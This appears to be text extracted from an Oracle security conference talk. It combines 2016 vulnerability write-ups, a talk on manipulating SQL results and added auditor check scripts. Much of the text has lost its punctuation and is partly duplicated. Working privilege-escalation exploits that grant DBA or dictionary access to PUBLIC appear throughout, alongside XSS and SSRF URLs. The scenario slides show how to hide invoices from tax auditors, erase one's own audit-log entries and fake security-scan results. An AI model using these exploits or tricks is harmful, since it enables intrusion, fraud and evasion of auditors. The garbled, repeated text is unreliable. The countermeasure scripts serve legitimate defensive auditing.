databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
... where x=y
WHERE conditions can be changed using VPD (Virtual Private Database).
VPD: add the where clause invoice_name = SAUNA_CLUB CHANTAL
Hide "certain" invoices from the audit
department.
Select value from table/view where x=y
The SQL Translation Framework (12c only) allows replacing
an entire query: the user submits Query A, and the SQL Translation Framework replaces Query A
with Query B.
Possible Countermeasures for paranoid Auditors
- Add a random string (e.g. aksdjhiuz) to each query so it no longer matches a registered
  SQL Translation Framework rule (new SQL_ID)
- Try to get EXEMPT ACCESS POLICY to disable
  VPD (even if not used in the application)
- Use fully qualified names instead of synonyms (e.g. SYS.DUAL instead of DUAL)
- Always check the object type (is it really a table?)
- Use checksums for certain database objects
  (especially views)
- Check the current schema to avoid attacks
  (e.g. alter session set current_schema=otheruser)
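The countermeasures above as a set of dictionary queries an auditor can run before trusting a result set; this is an added example and not part of the slides. It assumes the auditing account can read the DBA_* and REDACTION_* views, has EXECUTE on SYS.DBMS_CRYPTO, and runs against 12c (the SQL Translation views and DBMS_CRYPTO.HASH_SH256 are 12c features).

```sql
-- Added example (not from the slides): auditor-side checks for the
-- query-manipulation features described above. Every row returned by
-- checks 3, 5, 6 and 8 is a finding; checks 1, 2, 4 and 7 are reviewed
-- against an expected baseline.
-- Assumptions: account can read DBA_*/REDACTION_* views, has EXECUTE on
-- SYS.DBMS_CRYPTO, database is 12c.
SET LINESIZE 200 PAGESIZE 100

-- 1. Data Redaction: any policy here means selected values can be
--    rewritten per session (the FALSE-shown-as-TRUE trick).
SELECT object_owner, object_name, policy_name, expression, enable
  FROM redaction_policies
 ORDER BY object_owner, object_name;

-- 2. VPD policies: these append WHERE clauses to the audited query
--    (the hidden-invoice trick). PF_OWNER/PACKAGE/FUNCTION is the
--    policy function that generates the predicate.
SELECT object_owner, object_name, policy_name,
       pf_owner, package, "FUNCTION", enable, sel, ins, upd, del
  FROM dba_policies
 ORDER BY object_owner, object_name;

-- 3. Accounts that bypass VPD entirely: the auditing account should be
--    listed, nobody unexpected should.
SELECT grantee
  FROM dba_sys_privs
 WHERE privilege = 'EXEMPT ACCESS POLICY';

-- 4. SQL Translation Framework (12c): registered profiles and the
--    statement pairs (Query A -> Query B) they rewrite.
SELECT owner, profile_name, translator
  FROM dba_sql_translation_profiles;
SELECT owner, profile_name, sql_text, translated_text, enabled
  FROM dba_sql_translations;

-- 5. Synonym redirection: well-known public synonyms must resolve to
--    the SYS object of the same name. A DUAL synonym pointing at
--    SYS.MYDUAL (as on the slide) is returned here.
SELECT synonym_name, table_owner, table_name
  FROM dba_synonyms
 WHERE owner = 'PUBLIC'
   AND synonym_name IN ('DUAL', 'DBA_AUDIT_TRAIL', 'DBA_USERS', 'DBA_ROLE_PRIVS')
   AND NOT (table_owner = 'SYS' AND table_name = synonym_name);

-- 6. Object type check: DUAL must exist only as SYS/TABLE plus the
--    PUBLIC/SYNONYM; a view named DUAL, or a second DUAL anywhere, is a hit.
SELECT owner, object_name, object_type
  FROM dba_objects
 WHERE object_name = 'DUAL'
   AND NOT (   (owner = 'SYS'    AND object_type = 'TABLE')
            OR (owner = 'PUBLIC' AND object_type = 'SYNONYM'));

--    Tables replaced by a view plus INSTEAD OF trigger show up here.
SELECT owner, trigger_name, table_owner, table_name
  FROM dba_triggers
 WHERE trigger_type = 'INSTEAD OF';

-- 7. Checksums of security-relevant views, compared against a baseline
--    taken from a clean installation at the same patch level.
--    DBMS_METADATA returns the full DDL as a CLOB, so long view texts
--    are not truncated (DBA_VIEWS.TEXT_VC would cut them at 4000 bytes).
SELECT v.view_name,
       RAWTOHEX(DBMS_CRYPTO.HASH(DBMS_METADATA.GET_DDL('VIEW', v.view_name, 'SYS'),
                                 DBMS_CRYPTO.HASH_SH256)) AS sha256
  FROM dba_views v
 WHERE v.owner = 'SYS'
   AND v.view_name IN ('DBA_AUDIT_TRAIL', 'DBA_USERS', 'DBA_ROLE_PRIVS', 'DBA_SYS_PRIVS');

-- 8. Session sanity: a row here means CURRENT_SCHEMA was changed, so
--    unqualified names resolve in another user's schema. SYS.DUAL is
--    used deliberately instead of the public synonym.
SELECT SYS_CONTEXT('USERENV', 'SESSION_USER')   AS session_user,
       SYS_CONTEXT('USERENV', 'CURRENT_SCHEMA') AS current_schema
  FROM sys.dual
 WHERE SYS_CONTEXT('USERENV', 'SESSION_USER') <> SYS_CONTEXT('USERENV', 'CURRENT_SCHEMA');
```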
Modifying Queries on the fly
Powerful features for applications
(Huge) potential on critical systems to modify
application logic (e.g. DB Vault)
DBAs and Auditors/Security Department should
be aware of powerful Oracle features which
could be used to modify application logic.
Audit these features even if not in use.
Trends 2017
New hardening documents for Oracle 12.2
required (new features, new packages, ...)
Migration to 12.2
More auditing projects
Integration of Auditing with SIEM solutions
Q & A
Thank you
Contact:
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Oracle Vulnerabilities 2016
Oracle Vulnerabilities 2016
Number of vulnerabilities in Oracle database increasing again
iexcl 30 findings in 2016 (2015 29 2014 43 2013 13 2012 17)
iexcl 8 remote exploitable bugs (20153 2014 4 2013 7 2012 8 )
bull January 2016 CPU (7 Vulnerabilities ndash 0 remote)
bull April 2016 CPU (5 Vulnerabilities ndash 2 remote)
bull July 2016 CPU (9 Vulnerabilities ndash 5 remote)
bull October 2016 CPU (9 Vulnerabilities ndash 1 remote)
2016
January 2016
Oracle CPU January 2016
Exploiting the Oracle Workspace Manager SQL
Race Condition (David Litchfield)
DB Database Assessment Tool
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html httpwwwdavidlitchfieldcomExploitingtheOracleWorkspaceManagerSQLRaceConditionpdf httpsgithubcomfoospidyDbDat
January 2016 CPU
7 security fixes (No remote exploitable)
1 Java VM (CVSS 90)
1 Workspace Manager (CVSS 65)
2 XML Database (CVSS 55 40)
1 Database Vault (CVSS 40)
1 Security (CVSS 40)
1 XML Developerrsquos Kit (CVSS 40)
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html
Jan 2016 CPU- CVE-2016-0467
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Oracle native auditing fails to capture
bdquoCreate Java Sourceldquo
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
Jan 2016 CPU- CVE-2015-4921
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Status is incorrectly reported if SYS
Auditing is used together with DB Vault
Reporter David Litchfield
Jan 2016 CPU- CVE-2015-4925
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Privilege escalation via Race Condition
in WMSYSLTCOPYFORUPDATE
Reporter David Litchfield
The Oracle Workspace Manager allows a user to version enable database tables This is achieved by creating workspaces which contain the versioned data The Workspace Manager contains a number of PLSQL packages that are used to manage workspaces To function correctly some management actions must be performed with higher privileges than a normal user might have and so to enable this some of the management functions execute with the privileges of the WMSYS user The main workspace manager interface is the LT PLSQL package and this executes with the privileges of the user that calls or invokes LT When privileged work is required to be executed LT calls the LTADM package The LTADM package executes with the privileges of the owner or definer in this case WMSYS WMSYS has a number of very powerful privileges such as CREATE ANY TRIGGER that allows the grantee the privilege to create a trigger in any schema with the exception of the SYS schema
Jan 2016 CPU- CVE-2015-4925
SELECT COUNT() INTO CNTFROM V$OPEN_CURSOR OC V$SQL S V$OBJECT_DEPENDENCY OD WHERE OCSID = USER_SID AND [hellip] AND ODTO_TYPE IN (78911)
Here ODTO_TYPEs 789 and 11 are functions procedures packages and objects If any such dependency exists then the user supplied query will not be executed and an error is raised IF (CNTgt0) THEN WMSYSWM_ERRORRAISEERROR(WMSYSLTWM_ERROR_81_NO) END IF
SQL_STR2 =declaredelstatuses wmsysltUtilnumber_tab beginselect WM_delstatus bulk collect into delstatusesfrom || WMSYSLTUTILGETVN(TABLE_OWNER TAB_NAME _BASE) || where WM_version = || CURVER || and || NEWWHERE_CLAUSE || for updateend WMSYSLTADMEXECSQL(SQL_STR2)
Jan 2016 CPU- CVE-2015-4925SQLgt CONNECT RACERPASSWORD SQLgt CREATE TABLE FOO(X NUMBER CONSTRAINT X_PK PRIMARY KEY(X)) SQLgt INSERT INTO FOO (X) VALUES (1) SQLgt COMMITSQLgt EXEC WMSYSLTENABLEVERSIONING(sbquoFOO)
SQLgt create or replace function Y return number authid current_user is 2 pragma autonomous_transaction3 begin4 dbms_outputput_line(BANG)5 execute immediate create or replace procedure owned(p varchar) is begin execute immediate p end6 execute immediate grant execute on owned to public7 dbms_outputput_line(sys_context(userenvcurrent_user)) 8 return 19 end 10
Jan 2016 CPU- CVE-2015-4925SQLgt GRANT EXECUTE ON Y TO PUBLIC SQLgt CREATE TABLE RACER(Y NUMBER) SQLgt INSERT INTO RACER(Y) VALUES (1) SQLgt COMMIT
SQLgt create or replace procedure attempt_it is 2 begin 3 execute immediate BEGIN WMSYSLTCOPYFORUPDATE(FOOX=LENGTH((SELECT 1 FROM RACERRACER WHERE RACERY=1))) END 4 exception when others then 5 null6 end7 SQLgt declare2 i number=0 3 begin4 for i in 11000 loop 5 execute immediate alter table RACERRACER rename column Y to Z6 execute immediate alter table RACERRACER rename column Z to Y7 end loop 8 end9
Jan 2016 CPU- CVE-2015-4925
SQLgt DESC WMSYSOWNED
PROCEDURE WMSYSOWNED Argument Name Type InOut Default mdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdash-
P VARCHAR2 IN
February 2016
nothing special happened
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
httpwwworaclecomtechnetworktopicssecuritycpuapr2015-2365600html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 90)
1 OLAP (CVSS 78)
3 RDBMS Security (CVSS 59 33 33 1 remote)
httpwwworaclecomtechnetworksecurity-advisorycpuapr2016v3-2985753html
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016
Nothing special happened
October 2016
Oracle CPU October 2016
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html

October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 9.1)
2 Kernel PDB (CVSS 6.4, 6.0)
3 RDBMS Security (CVSS 6.4, 3.3, 3.3)
1 APEX (CVSS 6.1, remote)
1 RDBMS Security & SQL*Plus (CVSS 2.4)
Oct 2016 CPU - CVE-2016-5497
Problem: UNSALTED MD5 HASH STILL PRESENT IN 12C DATABASE - DIGEST VERIFIER
Shown as an open problem at the DOAG 2015 presentation
Reporter: Alexander Kornbrust
Oracle Password Hash 12.1.0.2+
Oracle 12.1.0.2 introduced a new PBKDF2 SHA-512 based algorithm.
The new T: password hash is 10 times slower than the old DES hash (Oracle 7+)
and 88 times slower than the SHA-1 based hash (Oracle 11+).
The new algorithm is known and already implemented in some tools.
Remark: Microsoft Office 2013 is 10 times more time consuming to crack than the
new Oracle PBKDF2.
Oracle Password Hash 12.1.0.2+
Let's have a look at RFC 2617:
KD(secret, data) = H(concat(secret, ":", data))
No salt, but a secret.
Secret = 'XDB'
and the hash will be MD5('XDB:tiger')
and stored in the spare4 column, starting with 'H:' (Hash).
Oct 2016 CPU - CVE-2016-5516
Problem: In Oracle 12c the DBMS_PDB_EXEC_SQL procedure is a wrapper for the
DBMS_PDB.EXEC_AS_ORACLE_SCRIPT procedure, which executes SQL as the SYS user.
The XDB user has the execute privilege on DBMS_PDB_EXEC_SQL, and as such, by
first exploiting a vulnerability in a publicly executable XDB-owned PL/SQL
object, an attacker can leverage this privilege to execute SQL as SYS. The fix
changes both DBMS_PDB_EXEC_SQL and DBMS_PDB from the DEFINER rights to the
INVOKER rights execution model.
Reporter: David Litchfield
Oct 2016 CPU - CVE-2016-5604
Problem: Privilege Escalation in Oracle Cloud Control (12.1.3)
Reporter: Alexander Kornbrust

$ sqlplus sysman_apm/rds@ora1
SQL> desc dba_users
ERROR:
ORA-04043: object "SYS"."DBA_USERS" does not exist

==> user does not have the privilege to access DBA_USERS
SQL> select * from user_sys_privs;
USERNAME                       PRIVILEGE                                ADM
------------------------------ ---------------------------------------- ---
SYSMAN_APM                     UNLIMITED TABLESPACE                     NO
SYSMAN_APM                     CREATE VIEW                              NO
SYSMAN_APM                     CREATE ANY LIBRARY                       NO
SYSMAN_APM                     CREATE SEQUENCE                          NO
SYSMAN_APM                     CREATE TABLE                             NO
SYSMAN_APM                     CREATE LIBRARY                           NO
SYSMAN_APM                     CREATE ANY INDEX                         NO

==> CREATE ANY LIBRARY privilege is granted to SYSMAN_APM
SQL> select * from user_role_privs;
USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYSMAN_APM                     CONNECT                        NO  YES NO
SYSMAN_APM                     RESOURCE                       NO  YES NO

==> Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER
SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  2  PRAGMA AUTONOMOUS_TRANSACTION;
  3  BEGIN
  4    execute immediate 'grant dba to public';
  5    COMMIT;
  6    RETURN FOO;
  7  END;
  8  /
==> Grant execution privileges to PUBLIC
SQL> grant execute on getdba to public;

==> Create an index on SYSTEM.HELP using a function based index (FBI). The function getdba is used for the function based index.
SQL> CREATE INDEX EXPLOIT_INDEX ON SYSTEM.HELP(SYSMAN_APM.GETDBA('AK2'));

==> Reconnect is necessary
SQL> select * from dba_role_privs where granted_role='DBA' and grantee='PUBLIC';
GRANTEE                        GRANTED_ROLE                   ADM DEF
------------------------------ ------------------------------ --- ---
PUBLIC                         DBA                            NO  YES
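Both function-based-index escalations above (CVE-2016-3489 on SYS.INCVID, CVE-2016-5604 on SYSTEM.HELP) need an index privilege on a dictionary table plus a function in a foreign schema, and they leave such an index behind. The following SQL*Plus script checks for both; it is an added example, not code from the slides or from Oracle, and assumes a DBA-level session on Oracle 11.2 or 12.1 with the standard DBA_ dictionary views.

```sql
-- Added example (not from the original slides): find the preconditions of the
-- FBI privilege escalations shown for CVE-2016-3489 and CVE-2016-5604, and the
-- artefact they leave behind. Assumes a DBA-level session on Oracle 11.2+/12.1.
SET SERVEROUTPUT ON SIZE UNLIMITED
SET LINESIZE 200

-- 1a. Object privilege INDEX on SYS/SYSTEM tables held by someone other than the
--     owner (the slides found SYSTEM holding it on INCEXP, INCFIL and INCVID).
SELECT grantee, owner, table_name
  FROM dba_tab_privs
 WHERE privilege = 'INDEX'
   AND owner IN ('SYS', 'SYSTEM')
   AND grantee <> owner
 ORDER BY grantee, owner, table_name;

-- 1b. System privilege CREATE ANY INDEX (held by SYSMAN_APM and WMSYS in the
--     slides). Roles are listed too; resolve them via DBA_ROLE_PRIVS.
SELECT grantee, admin_option
  FROM dba_sys_privs
 WHERE privilege = 'CREATE ANY INDEX'
   AND grantee <> 'SYS'
 ORDER BY grantee;

-- 2. Function-based indexes on SYS/SYSTEM tables whose expression calls code
--    owned by a third schema, e.g. "SYSTEM"."GETDBA"('AK') on SYS.INCVID.
--    COLUMN_EXPRESSION is a LONG, so it is fetched in PL/SQL; plain SQL cannot
--    apply LIKE or REGEXP_LIKE to a LONG column.
DECLARE
  l_expr   VARCHAR2(32767);
  l_schema VARCHAR2(128);
BEGIN
  FOR r IN (SELECT ie.index_owner, ie.index_name,
                   ie.table_owner, ie.table_name, ie.column_expression
              FROM dba_ind_expressions ie
             WHERE ie.table_owner IN ('SYS', 'SYSTEM'))
  LOOP
    l_expr := UPPER(r.column_expression);
    -- schema part of the first "SCHEMA"."OBJECT"( call in the expression
    l_schema := REGEXP_SUBSTR(l_expr,
                  '"([A-Z0-9_$#]+)"\."[A-Z0-9_$#]+"\s*\(', 1, 1, NULL, 1);
    IF l_schema IS NOT NULL AND l_schema <> r.table_owner THEN
      DBMS_OUTPUT.PUT_LINE('SUSPICIOUS FBI ' || r.index_owner || '.' || r.index_name
        || ' on ' || r.table_owner || '.' || r.table_name
        || ' calls code owned by ' || l_schema || ': ' || SUBSTR(l_expr, 1, 200));
    END IF;
  END LOOP;
END;
/
```

An index reported by step 2 whose function is AUTHID CURRENT_USER and not owned by the table owner is exactly the pattern the two demos create; on 12.1.0.2 the INHERIT PRIVILEGES check shown above blocks it only when the function owner lacks INHERIT ANY PRIVILEGES.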
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
A top manager comes to the office of the DBA and asks you:
"Tomorrow the auditor from the tax authority will come to check our invoices.
Could you hide the 10000 EUR invoice from the last party at the night club,
just from the auditor? I will increase your salary..."

Scenario 2
Remove your own audit entries from the audit log, which is retrieved by the
SIEM solution (e.g. Splunk, QRadar, ...) via JDBC.

Scenario 3
You don't have time to harden all your databases, but the security department
wants to see results. Instead of fixing the problem you will just deliver the
proper results.

A lot of different wishes...
but luckily we are using Oracle
Problem & Solution
Oracle offers different features to fulfill these wishes without affecting other users...
All these scenarios have in common that we have to manipulate the SQL statement.

Select value ...
Oracle Data Redaction allows to mask / manipulate the selected data just for a
single database user.
Possible usage: replace true/false, replace USER/ADMIN, ...
The DBA can decide what will be returned.

Select value ...
A typical query from security checklists/scanners looks like this:
select upper(value) from parameter where upper(name) = 'XYZ'
The tool expects the value TRUE, but it contains FALSE.
Oracle Data Redaction allows you to change the result value from FALSE to TRUE.
==> The audit department is happy because the database passes all the security checks...
... from table/view ...
Modifying objects can be used as a man in the middle as well.
Possible approaches:
- modify views (e.g. add spare=DBA1 to the view dba_audit_trail). All entries
  of the OS user DBA1 will be removed in the view. If a SIEM solution retrieves
  the audit data, the entries of DBA1 are not retrieved.
- create or change synonyms to "redirect" objects
- replace a table with a view / an INSTEAD OF trigger

----- dbms_macadm -----
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP  VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) = 4000 THEN RETURN 'N'; END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN RETURN 'N'; END IF;
  RETURN 'Y';
END;

SQL> create or replace view mydual as select 'X' as dummy from dual where user='DVSYS';
SQL> grant select on sys.mydual to public;
SQL> drop public synonym dual;
SQL> create public synonym dual for sys.mydual;

SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
... where x=y
where conditions can be changed using VPD
VPD: add the where clause invoice_name = 'SAUNA_CLUB CHANTAL'
Hide "certain" invoices from the audit department

Select value from table/view where x=y
SQL Translation Framework (12c only) allows to replace an entire query.
User submits Query A, SQL Translation Framework replaces Query A with Query B.

Possible Countermeasures for paranoid Auditors
- Add a random string, e.g. aksdjhiuz, to avoid the SQL Translation Framework (new SQL ID)
- Try to get EXEMPT ACCESS POLICY to disable VPD (even if not used in the application)
- Use fully qualified names instead of synonyms (e.g. SYS.DUAL instead of DUAL)
- Always check the object type (is it really a table?)
- Use checksums for certain database objects (especially views)
- Check the current schema to avoid attacks (e.g. alter session set current_schema=otheruser)
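The countermeasure list above, turned into one SQL*Plus script an auditor can run before trusting any checklist result: current schema, the DUAL synonym, object types and INSTEAD OF triggers, exemption privileges, VPD / redaction / translation policies, and view checksums. This is an added example, not code from the slides or from Oracle; it assumes Oracle 12.1+ (SQL Translation Framework, REDACTION_POLICIES, DBMS_CRYPTO.HASH_SH256) and a session that may read the DBA_ views, and the object names in the IN lists are the ones the slides mention.

```sql
-- Added example (not from the original slides): auditor-side checks for the
-- countermeasure list. Assumes Oracle 12.1+ and SELECT on the DBA_ views.
SET LINESIZE 200
SET PAGESIZE 200
SET SERVEROUTPUT ON SIZE UNLIMITED

-- 1. Whose schema am I really in? (defeats ALTER SESSION SET CURRENT_SCHEMA=otheruser)
SELECT SYS_CONTEXT('USERENV', 'SESSION_USER')   AS session_user,
       SYS_CONTEXT('USERENV', 'CURRENT_SCHEMA') AS current_schema
  FROM sys.dual;                      -- fully qualified on purpose, see check 2

-- 2. Is DUAL still the SYS table, and does the public synonym still point at it?
SELECT owner, object_name, object_type, CAST(NULL AS VARCHAR2(261)) AS target
  FROM dba_objects
 WHERE object_name = 'DUAL'
UNION ALL
SELECT owner, synonym_name, 'SYNONYM', table_owner || '.' || table_name
  FROM dba_synonyms
 WHERE synonym_name = 'DUAL';
-- Expected: one TABLE SYS.DUAL, one PUBLIC synonym DUAL -> SYS.DUAL, nothing else.

-- 3. Is the audited object really a table, or a view (possibly a table replaced
--    by a view plus INSTEAD OF trigger)?
SELECT o.owner, o.object_name, o.object_type,
       (SELECT COUNT(*) FROM dba_triggers t
         WHERE t.table_owner = o.owner AND t.table_name = o.object_name
           AND t.trigger_type = 'INSTEAD OF') AS instead_of_triggers
  FROM dba_objects o
 WHERE (o.owner, o.object_name) IN (('SYS', 'AUD$'), ('SYS', 'DBA_AUDIT_TRAIL'))
   AND o.object_type IN ('TABLE', 'VIEW');

-- 4. Which session privileges neutralise row/column rewriting for me?
SELECT privilege
  FROM session_privs
 WHERE privilege IN ('EXEMPT ACCESS POLICY', 'EXEMPT REDACTION POLICY');
-- Empty result: VPD and Data Redaction still filter what this session sees.

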